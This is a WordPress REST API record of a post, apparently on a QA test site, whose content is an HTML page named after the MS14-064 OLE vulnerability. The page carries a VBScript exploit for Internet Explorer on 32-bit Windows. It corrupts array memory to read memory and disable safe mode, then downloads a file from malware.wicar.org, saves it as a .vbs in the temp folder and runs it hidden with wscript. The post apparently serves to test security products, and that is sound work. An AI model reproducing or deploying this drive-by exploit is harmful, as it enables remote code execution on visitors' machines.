{"id":30,"date":"2026-04-07T16:13:16","date_gmt":"2026-04-07T16:13:16","guid":{"rendered":"https:\/\/qa-040726-3.sldev7.com\/?p=30"},"modified":"2026-04-07T16:13:16","modified_gmt":"2026-04-07T16:13:16","slug":"post-test_ms14_064_ole_xp-html","status":"publish","type":"post","link":"https:\/\/qa-040726-3.sldev7.com\/?p=30","title":{"rendered":"Post .\/TEST_ms14_064_ole_xp.html"},"content":{"rendered":"<p><!doctype html><br \/>\n<html><br \/>\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=EmulateIE8\" ><br \/>\n<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-8\" \/><br \/>\n<body><br \/>\n<script language=\"VBScript\">\nfunction runaaaa()\nOn Error Resume Next<\/p>\n<p>set xmlhttp = CreateObject(\"Microsoft.XMLHTTP\")\nxmlhttp.open \"GET\", \"http:\/\/malware.wicar.org\/data\/ms14_064_ole_xp.gif\", False\nxmlhttp.send<\/p>\n<p>Set objFSO=CreateObject(\"Scripting.FileSystemObject\")\nfolder = objFSO.GetSpecialFolder(2)\nscriptName = folder + \"\\HuvP.vbs\"\nSet objFile = objFSO.CreateTextFile(scriptName,True)\nobjFile.Write xmlhttp.responseText\nobjFile.Close<\/p>\n<p>set shell=createobject(\"Shell.Application\")\nshell.ShellExecute \"wscript.exe\", scriptName, \"\", \"open\", 0<\/p>\n<p>end function\n<\/script><br \/>\n<script language=\"VBScript\"><\/p>\n<p>dim   aa()\ndim   ab()\ndim   a0\ndim   a1\ndim   a2\ndim   a3\ndim   win9x\ndim   intVersion\ndim   rnda\ndim   funclass\ndim   myarray<\/p>\n<p>Begin()<\/p>\n<p>function Begin()\n  On Error Resume Next\n  info=Navigator.UserAgent<\/p>\n<p>  if(instr(info,\"Win64\")>0)   then\n     exit   function\n  end if<\/p>\n<p>  if (instr(info,\"MSIE\")>0)   then\n             intVersion = CInt(Mid(info, InStr(info, \"MSIE\") + 5, 2))\n  else\n     exit   function<\/p>\n<p>  end if<\/p>\n<p>  win9x=0<\/p>\n<p>  BeginInit()\n  If Create()=True Then\n     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)\n     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)<\/p>\n<p>     if(intVersion<4) then\n         document.write(\"<br \/> IE\")\n         document.write(intVersion)\n         runshellcode()\n     else\n          setnotsafemode()\n     end if\n  end if\nend function<\/p>\n<p>function BeginInit()\n   Randomize()\n   redim aa(5)\n   redim ab(5)\n   a0=13+17*rnd(6)\n   a3=7+3*rnd(5)\nend function<\/p>\n<p>function Create()\n  On Error Resume Next\n  dim i\n  Create=False\n  For i = 0 To 400\n    If Over()=True Then\n    '   document.write(i)\n       Create=True\n       Exit For\n    End If\n  Next\nend function<\/p>\n<p>sub testaa()\nend sub<\/p>\n<p>function mydata()\n    On Error Resume Next\n     i=testaa\n     i=null\n     redim  Preserve aa(a2)<\/p>\n<p>     ab(0)=0\n     aa(a1)=i\n     ab(0)=6.36598737437801E-314<\/p>\n<p>     aa(a1+2)=myarray\n     ab(2)=1.74088534731324E-310\n     mydata=aa(a1)\n     redim  Preserve aa(a0)\nend function<\/p>\n<p>function setnotsafemode()\n    On Error Resume Next\n    i=mydata()\n    i=readmemo(i+8)\n    i=readmemo(i+16)\n    j=readmemo(i+&h134)\n    for k=0 to &h60 step 4\n        j=readmemo(i+&h120+k)\n        if(j=14) then\n              j=0\n              redim  Preserve aa(a2)\n     aa(a1+2)(i+&h11c+k)=ab(4)\n              redim  Preserve aa(a0)<\/p>\n<p>     j=0\n              j=readmemo(i+&h120+k)<\/p>\n<p>               Exit for\n           end if<\/p>\n<p>    next\n    ab(2)=1.69759663316747E-313\n    runaaaa()\nend function<\/p>\n<p>function Over()\n    On Error Resume Next\n    dim type1,type2,type3\n    Over=False\n    a0=a0+a3\n    a1=a0+2\n    a2=a0+&h8000000<\/p>\n<p>    redim  Preserve aa(a0)\n    redim   ab(a0)<\/p>\n<p>    redim  Preserve aa(a2)<\/p>\n<p>    type1=1\n    ab(0)=1.123456789012345678901234567890\n    aa(a0)=10<\/p>\n<p>    If(IsObject(aa(a1-1)) = False) Then\n       if(intVersion<4) then\n           mem=cint(a0+1)*16\n           j=vartype(aa(a1-1))\n           if((j=mem+4) or (j*8=mem+8)) then\n              if(vartype(aa(a1-1))<>0)  Then\n                 If(IsObject(aa(a1)) = False ) Then\n                   type1=VarType(aa(a1))\n                 end if\n              end if\n           else\n             redim  Preserve aa(a0)\n             exit  function<\/p>\n<p>           end if\n        else\n           if(vartype(aa(a1-1))<>0)  Then\n              If(IsObject(aa(a1)) = False ) Then\n                  type1=VarType(aa(a1))\n              end if\n            end if\n        end if\n    end if<\/p>\n<p>    If(type1=&h2f66) Then\n          Over=True\n    End If\n    If(type1=&hB9AD) Then\n          Over=True\n          win9x=1\n    End If<\/p>\n<p>    redim  Preserve aa(a0)<\/p>\n<p>end function<\/p>\n<p>function ReadMemo(add)\n    On Error Resume Next\n    redim  Preserve aa(a2)<\/p>\n<p>    ab(0)=0\n    aa(a1)=add+4\n    ab(0)=1.69759663316747E-313\n    ReadMemo=lenb(aa(a1))<\/p>\n<p>    ab(0)=0<\/p>\n<p>    redim  Preserve aa(a0)\nend function<\/p>\n<p><\/script><br \/>\n<\/body><br \/>\n<\/html><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":0,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-30","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/qa-040726-3.sldev7.com\/index.php?rest_route=\/wp\/v2\/posts\/30","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/qa-040726-3.sldev7.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/qa-040726-3.sldev7.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/qa-040726-3.sldev7.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=30"}],"version-history":[{"count":0,"href":"https:\/\/qa-040726-3.sldev7.com\/index.php?rest_route=\/wp\/v2\/posts\/30\/revisions"}],"wp:attachment":[{"href":"https:\/\/qa-040726-3.sldev7.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=30"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/qa-040726-3.sldev7.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=30"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/qa-040726-3.sldev7.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=30"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}